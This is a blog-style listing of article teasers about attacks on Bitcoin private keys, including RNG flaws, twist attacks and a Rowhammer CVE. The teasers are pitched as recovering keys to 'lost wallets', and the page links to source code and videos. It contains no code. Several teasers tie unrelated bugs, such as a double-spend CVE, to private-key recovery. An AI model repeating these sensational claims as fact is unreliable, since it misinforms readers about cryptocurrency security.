  25. Brainwallet Attack & Randstorm vulnerability – a critical error in the random number generation library, where it generates predictable private keys, which allows hackers to recover the key and steal all funds in Bitcoin coins Critical Vulnerability in Private Key Generation and Dangerous Attack on Bitcoin Cryptocurrency Security: Analysis of the Threat of Secret Data Leakage and Its Consequences In the Bitcoin network and similar… Read More
  26. Electrum Signature Forgery Attack & Key Recovery Attack Based on Weak RNG — Cryptographic Authentication Vulnerability in Electrum: Threat of Critical Attack on Bitcoin via Command Substitution and Theft of Funds in BTC Coins An attack based on these vulnerabilities is commonly called a Key Recovery Attack or more specifically an ECDSA Private Key Recovery Attack. “Critical Vulnerability in Bitcoin Private Key Generation: The Threat… Read More
  27. Denial of Service (DoS) Attack & Memory Corruption Attack – Recovering Private Key in Lost Bitcoin Wallets: Critical Memory Vulnerability, DoS Attack and Remote Code Execution Risk “Critical ZeroMQ Vulnerability: Buffer Overflow and Dangerous DoS Attack on Bitcoin Cryptocurrency Security. Dangerous ZeroMQ Buffer Overflow and Critical Threat to Bitcoin: Vulnerability and Impact Analysis of the Cryptoattack” In… Read More
  28. Double Spend Attack & Bitcoin Inflation Bug — Critical Bitcoin Vulnerability: Restoring Private Keys of Lost Cryptocurrency Wallets via Double Spend Attack (CVE-2018-17144) and Risk of Inflation Bug Critical Vulnerability in Bitcoin Transaction Validation: Double Spend Risk and Threat to Destabilize the Cryptocurrency Network. Critical Vulnerability in Bitcoin Transaction Validation: Impact and Classification of the Attack Bitcoin is a… Read More
  29. Low or Zero Private Key Attack & Invalid Private Key Attack — Critical Vulnerability in Bitcoin: Private Key Recovery for Lost Wallets via Invalid Curve Attack and Incorrect secp256k1 Validation A cryptographic vulnerability due to insufficient validation of secp256k1 elliptic curve points in Bitcoin’s code can lead to an attack known in the scientific literature and the cryptographic community as… Read More
  30. Implementation Substitution Attack with Cryptographic Backdoor Elements — Recovering Private Keys to Lost Bitcoin Wallets: Critical ECC Library Substitution Vulnerability and Threat of Catastrophic Attack on Crypto Industry Network Security A critical vulnerability in the elliptic curve cryptography (ECC) library spoofing or incorrect initialization threatens the entire security of the Bitcoin network, as the compromise of cryptographic operations leads to… Read More
  31. Twist Attack Explicit Key Leakage & Twist Attack Implicit Key Leakage — Fundamental threat to cryptocurrency: leakage of private keys and Twist Attack as a factor in the total hack of Bitcoin as a compromise of private keys that leads to the complete loss of BTC coins (Bitcoin) “Bitcoin’s Cryptographic Armageddon: Explicit and Implicit Key Leakage and Critical Attacks on secp256k1 Threaten Full Network Compromise.” A private key leak is one of the most dangerous cryptographic vulnerabilities for… Read More
  32. Injection attack & Remote Code Execution (RCE) — Critical Memory Disclosure Vulnerability in Bitcoin: Remote Code Injection Attacks and Uninitialized Memory Leaks as a Way to Recover Private Keys and Compromise Lost Wallets Injection attack — the introduction and execution of malicious code through vulnerable dependencies. Remote Code Execution (RCE) — remote execution of arbitrary code through vulnerabilities in the client RPC interface. Leakage… Read More
  33. Private Key Leakage & Key Disclosure Attack — Critical Vulnerability of the Private Key in Bitcoin: Restoring Lost Wallets and the “Secret Key Leakage” Attack — the Effect of a Chain Catastrophe and the Destruction of the Integrity of the Cryptocurrency World A critical vulnerability in Bitcoin’s private key instantly destroys the fundamental trust model of a decentralized system: ownership of funds in the blockchain is ensured solely by knowledge of the… Read More
  34. Quantum Key Recovery Attack on ECDSA Public Keys — Quantum recovery of private keys in lost Bitcoin wallets: critical vulnerability of ECDSA and Harvest Now, Decrypt Later attack as a threat of mass compromise of cryptocurrency BTC, ETH, etc. Critical P2PK Vulnerability in Bitcoin: Quantum Key Recovery Attack on ECDSA Public Keys and the Threat of Massive Fund Compromise. With the advent of quantum computing using Shor’s algorithm, it… Read More
  35. Birthday Attack & Randstorm PRNG Attack — Critical vulnerabilities in random number generation and attacker’s recovery of private keys to lost Bitcoin wallets: Randstorm attack and weakness of the generator for forming Bitcoin addresses P2PKH The diagram clearly demonstrates that even correctly written P2PKH code can become an entry point for attackers when using compromised dependencies or in the absence of additional security measures. What… Read More
  36. Doppelgänger Script Strike: A Revolutionary Method for Recovering Lost Bitcoin Wallets’ Private Keys by Exploiting P2WSH Hash Collisions and Destructive Attacks on the Fundamental Architecture of Blockchain Security Doppelgänger Script Strike (Script Hash Collision Attack) — Critical vulnerability In Bitcoin protocols, this is a real and dangerous anomaly in the cryptographic architecture of the world’s largest decentralized currency.… Read More
  1. Doppelgänger Script Strike: A Revolutionary Method for Recovering Lost Bitcoin Wallets’ Private Keys by Exploiting P2WSH Hash

Phoenix Rowhammer Attack: Systemic Risk of Bitcoin Wallet Private Key Compromise in Global Blockchain Infrastructure Due to a Critical SK Hynix DDR5 Vulnerability (CVE-2025-6202)

This material was created for the  CRYPTO DEEP TECH portal  to ensure financial data security and elliptic curve cryptography (  secp256k1 )  against weak  ECDSA signatures  in the  BITCOIN cryptocurrency . The software developers are not responsible for the use of this material.


Crypto Tools

Source code

Google Colab

Telegram: https://t.me/cryptodeeptech

Video material: https://youtu.be/lvNWcBMHESo

Video tutorial: https://dzen.ru/video/watch/68ebe9367847b33269940e47

Source: https://cryptodeeptech.ru/phoenix-rowhammer-attack


Phoenix Rowhammer Attack: Systemic Risk of Bitcoin Wallet Private Key Compromise in Global Blockchain Infrastructure Due to a Critical SK Hynix DDR5 Vulnerability (CVE-2025-6202)

 

 Cryptanalysis

How do you rate this article?

7


CryptoDeep
CryptoDeep

Financial security of data and secp256k1 elliptic curve cryptography against weak ECDSA signatures in BITCOIN cryptocurrency


CRYPTODEEP
CRYPTODEEP

Financial security of data and secp256k1 elliptic curve cryptography against weak ECDSA signatures in BITCOIN cryptocurrency [email protected] - Email for all questions. The creators of the software are not responsible for the use of materials Donation Address: ♥ BTC: 1Lw2gTnMpxRUNBU85Hg4ruTwnpUPKdf3nV ♥ETH: 0xaBd66CF90898517573f19184b3297d651f7b90bf ♥ YooMoney.ru/to/410011415370470

Publish0x

Send a $0.01 microtip in crypto to the author, and earn yourself as you read!

20% to author / 80% to me.
We pay the tips from our rewards pool.